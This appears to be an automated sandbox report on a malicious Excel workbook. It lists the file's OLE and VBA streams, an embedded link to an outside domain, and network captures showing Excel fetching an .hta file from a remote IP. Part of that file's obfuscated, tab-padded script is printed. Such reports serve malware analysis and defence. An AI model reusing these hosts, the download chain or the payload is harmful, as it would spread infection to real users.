                          Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0043A31E/Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:386813
                          Entropy:7.815032759709734
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          General
                          Stream Path:MBD0043A31F/\x1Ole
                          CLSID:
                          File Type:data
                          Stream Size:434
                          Entropy:5.762407281569465
                          Base64 Encoded:False
                          Data ASCII:. . . . . c ` . R . w . . . . . . . . . . . . H . . . y . . . K . D . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . l . i . T . 0 . Q . q . i . Q . ? . & . s . k . a . t . e . = . y . u . m . m . y . & . s . a . c . k . = . g . i . g . a . n . t . i . c . & . e . p . e . e . = . d . a . m . a . g . e . d . & . b . o . o . k . c . a . s . e . . . . ! ( K A 1 c . e . . . U . . d . M P k . | n 9 M . H " m . V F . . . z . 6 * i ` . . . . X Q u c T w U . . s . . V z C
                          Data Raw:01 00 00 02 1d 63 60 1b 52 00 d2 77 00 00 00 00 00 00 00 00 00 00 00 00 48 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 44 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 6c 00 69 00 54 00 30 00 51 00 71 00 69 00 51 00 3f 00 26 00 73 00 6b 00 61 00 74 00 65 00 3d 00 79 00 75 00 6d 00
                          General
                          Stream Path:Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:434917
                          Entropy:7.9991973628704915
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . j & v x . . I Y * % . e k { . D A p n W @ . Q . . . . . . . . . . \\ . p . $ ` ' . N X . D y . . m . h K ( * c S . U . v . . z . d 0 L U o < . g ? O = ; G ` u H C . . B g . p 1 Z \\ p s u \\ b . H f B . . . ( a . . . | " . . . = . . . 5 z E Q . . . \\ F W . O S a _ Z . . . R . . . . . . . . h . . . . [ . . . . " . . . . . 4 = . . . . e H . . . 8 . @ . . . . . . . v " . . . g . . . . . T . . . . . . . . . 1 . . . 9 & . . 8 . . . b . \\ y 1 . . . U $ : o
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 0a db 6a 26 b0 76 78 98 ed 90 be b5 c8 08 49 a5 59 2a ff 25 d7 07 da 65 b1 94 6b e6 8a 7b 00 44 41 70 9d 20 6e 57 e1 40 ca a5 c7 cd 51 94 dc f6 e1 00 02 00 b0 04 c1 00 02 00 d1 c5 e2 00 00 00 5c 00 70 00 ae 24 60 27 c1 12 4e a8 cf 58 a9 03 44 e0 79 d0 ce c9 c3 1d 05 6d de a6 68 f2 f3 4b 9d 28
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                          CLSID:
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:529
                          Entropy:5.251368295158988
                          Base64 Encoded:True
                          Data ASCII:I D = " { 4 A F 5 E 7 3 E - 9 F 1 B - 4 1 3 2 - A E 5 0 - 8 4 0 3 0 E 9 6 1 4 5 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 2 A 0 1 8 4 0 3 6 4 4 3 6 4 4 3
                          Data Raw:49 44 3d 22 7b 34 41 46 35 45 37 33 45 2d 39 46 31 42 2d 34 31 33 32 2d 41 45 35 30 2d 38 34 30 33 30 45 39 36 31 34 35 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                          CLSID:
                          File Type:data
                          Stream Size:104
                          Entropy:3.0488640812019017
                          Base64 Encoded:False
                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                          CLSID:
                          File Type:data
                          Stream Size:2644
                          Entropy:3.99042386590494
                          Base64 Encoded:False
                          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                          CLSID:
                          File Type:data
                          Stream Size:553
                          Entropy:6.3741460525163065
                          Base64 Encoded:True
                          Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                          Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 19 b0 99 69 1c 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 14, 2025 13:39:27.944233894 CET49773443192.168.2.414.103.79.10
                          Jan 14, 2025 13:39:27.944257021 CET4434977314.103.79.10192.168.2.4
                          Jan 14, 2025 13:39:27.944308996 CET49773443192.168.2.414.103.79.10
                          Jan 14, 2025 13:39:27.944551945 CET49773443192.168.2.414.103.79.10
                          Jan 14, 2025 13:39:27.944559097 CET4434977314.103.79.10192.168.2.4
                          Jan 14, 2025 13:39:28.861360073 CET4434977314.103.79.10192.168.2.4
                          Jan 14, 2025 13:39:28.861582041 CET49773443192.168.2.414.103.79.10
                          Jan 14, 2025 13:39:28.865394115 CET49773443192.168.2.414.103.79.10
                          Jan 14, 2025 13:39:28.865398884 CET4434977314.103.79.10192.168.2.4
                          Jan 14, 2025 13:39:28.865597963 CET4434977314.103.79.10192.168.2.4
                          Jan 14, 2025 13:39:28.865650892 CET49773443192.168.2.414.103.79.10
                          Jan 14, 2025 13:39:28.865963936 CET49773443192.168.2.414.103.79.10
                          Jan 14, 2025 13:39:28.911339998 CET4434977314.103.79.10192.168.2.4
                          Jan 14, 2025 13:39:30.343956947 CET4434977314.103.79.10192.168.2.4
                          Jan 14, 2025 13:39:30.344023943 CET4434977314.103.79.10192.168.2.4
                          Jan 14, 2025 13:39:30.344094038 CET49773443192.168.2.414.103.79.10
                          Jan 14, 2025 13:39:30.344549894 CET49773443192.168.2.414.103.79.10
                          Jan 14, 2025 13:39:30.347856045 CET49773443192.168.2.414.103.79.10
                          Jan 14, 2025 13:39:30.347868919 CET4434977314.103.79.10192.168.2.4
                          Jan 14, 2025 13:39:30.349447966 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.354319096 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.354398012 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.354525089 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.359330893 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857084990 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857147932 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857156992 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857167006 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857183933 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857188940 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857193947 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857199907 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857254982 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857265949 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.857301950 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.857301950 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.857301950 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.857301950 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.862121105 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.862139940 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.862215042 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.945560932 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.945589066 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.945599079 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.945626020 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.945636034 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.945668936 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.945724964 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.946027040 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.946037054 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.946048021 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.946058035 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.946079016 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.946115971 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.946593046 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.946604013 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.946614027 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.946624994 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.946636915 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.946674109 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.947190046 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.947200060 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.947210073 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.947220087 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.947230101 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.947235107 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.947241068 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.947262049 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.947290897 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.948115110 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.948123932 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.948133945 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.948159933 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.948201895 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:30.950447083 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.950463057 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:30.950521946 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:31.034190893 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:31.034219980 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:31.034229994 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:31.034235954 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:31.034245014 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:31.034257889 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:31.034267902 CET8049787131.226.2.34192.168.2.4
                          Jan 14, 2025 13:39:31.034316063 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:31.034349918 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:31.151124001 CET4978780192.168.2.4131.226.2.34
                          Jan 14, 2025 13:39:31.151190996 CET4978780192.168.2.4131.226.2.34
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 14, 2025 13:39:27.355252028 CET6406453192.168.2.41.1.1.1
                          Jan 14, 2025 13:39:27.943510056 CET53640641.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jan 14, 2025 13:39:27.355252028 CET192.168.2.41.1.1.10x938Standard query (0)s.deemos.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 14, 2025 13:38:38.938551903 CET1.1.1.1192.168.2.40x6187No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                          Jan 14, 2025 13:38:38.938551903 CET1.1.1.1192.168.2.40x6187No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                          Jan 14, 2025 13:39:24.430078030 CET1.1.1.1192.168.2.40x742eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                          Jan 14, 2025 13:39:24.430078030 CET1.1.1.1192.168.2.40x742eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                          Jan 14, 2025 13:39:27.943510056 CET1.1.1.1192.168.2.40x938No error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                          Jan 14, 2025 13:39:44.936080933 CET1.1.1.1192.168.2.40x1c19No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                          Jan 14, 2025 13:39:44.936080933 CET1.1.1.1192.168.2.40x1c19No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                          Jan 14, 2025 13:39:44.936080933 CET1.1.1.1192.168.2.40x1c19No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                          • s.deemos.com
                          • 131.226.2.34
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449787131.226.2.34807732C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          TimestampBytes transferredDirectionData
                          Jan 14, 2025 13:39:30.354525089 CET254OUTGET /xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Connection: Keep-Alive
                          Host: 131.226.2.34
                          Jan 14, 2025 13:39:30.857084990 CET1236INHTTP/1.1 200 OK
                          Date: Tue, 14 Jan 2025 12:39:30 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Tue, 14 Jan 2025 07:37:17 GMT
                          ETag: "bab9-62ba5a1652450"
                          Accept-Ranges: bytes
                          Content-Length: 47801
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/hta
                          Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 33 35 25 33 32 25 33 31 25 33 36 25 33 34 25 33 34 25 33 39 25 33 36 25 33 30 25 33 32 25 36 32 25 36 34 25 33 37 25 33 30 25 36 31 25 33 36 25 32 30 25 36 34 25 32 38 25 33 33 25 32 37 25 33 38 25 33 64 25 33 34 25 32 39 25 36 33 25 34 63 25 35 38 25 35 31 25 35 30 25 32 32 25 30 61 25 32 30 25 35 31 25 34 39 25 35 38 25 34 35 25 36 33 25 34 63 25 35 38 25 35 38 25 35 34 25 37 30 25 34 39 25 35 35 25 35 39 25 34 64 25 35 61 25 32 31 25 36 35 25 33 63 25 37 30 25 33 39 25 32 35 25 37 30 25 32 37 25 35 33 25 35 31 25 35 34 25 34 35 25 35 38 25 34 64 25 34 36 25 35 30 25 34 39 25 36 35 25 36 33 25 34 37 25 35 33 25 35 32 25 35 38 25 34 39 25 35 32 25 35 38 25 32 31 25 36 35 25 32 64 25 32 39 25 32 31 25 32 39 25 35 31 25 35 39 25 35 30 25 34 35 25 35 38 25 34 39 25 32 64 25 32 39 25 37 62 25 36 35 25 36 33 25 32 32 25 30 61 25 32 30 25 34 63 [TRUNCATED]
                          Data Ascii: <script>...(function() { var d = unescape("%35%32%31%36%34%34%39%36%30%32%62%64%37%30%61%36%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%47%53%52%58%49%52%58%21%65%2d%29%21%29%51%59%50%45%58%49%2d%29%7b%65%63%22%0a%20%4c%58%51%50%22%0a%20%46%53%48%5d%22%0a%20%57%27%36%4d%34%38%63%50%45%52%4b%59%25%2b%49%21%65%3a%26%37%27%36%2d%54%38%65%22%0a%28%4d%51%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 13:39:30.857147932 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                          Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%35%
                          Jan 14, 2025 13:39:30.857156992 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                          Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%6f%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 13:39:30.857167006 CET1236INData Raw: 33 62 25 33 65 25 33 36 25 34 66 25 32 65 25 33 63 25 32 63 25 34 38 25 32 35 25 35 38 25 33 38 25 34 61 25 35 36 25 35 37 25 33 34 25 33 64 25 35 31 25 35 64 25 35 33 25 35 30 25 32 37 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                          Data Ascii: 3b%3e%36%4f%2e%3c%2c%48%25%58%38%4a%56%57%34%3d%51%5d%53%50%27%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 13:39:30.857183933 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                          Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%37%29%58%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 13:39:30.857188940 CET1236INData Raw: 34 66 25 33 35 25 34 38 25 33 30 25 35 62 25 35 63 25 35 39 25 35 33 25 32 36 25 35 32 25 34 35 25 32 39 25 35 38 25 32 38 25 33 31 25 33 30 25 34 63 25 34 35 25 35 64 25 32 66 25 34 38 25 33 39 25 34 36 25 35 64 25 32 63 25 33 34 25 32 62 25 34
                          Data Ascii: 4f%35%48%30%5b%5c%59%53%26%52%45%29%58%28%31%30%4c%45%5d%2f%48%39%46%5d%2c%34%2b%48%47%55%4f%4b%2e%50%56%26%4e%2f%4e%5b%5e%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 13:39:30.857193947 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                          Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 13:39:30.857199907 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                          Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 13:39:30.857254982 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                          Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 13:39:30.857265949 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
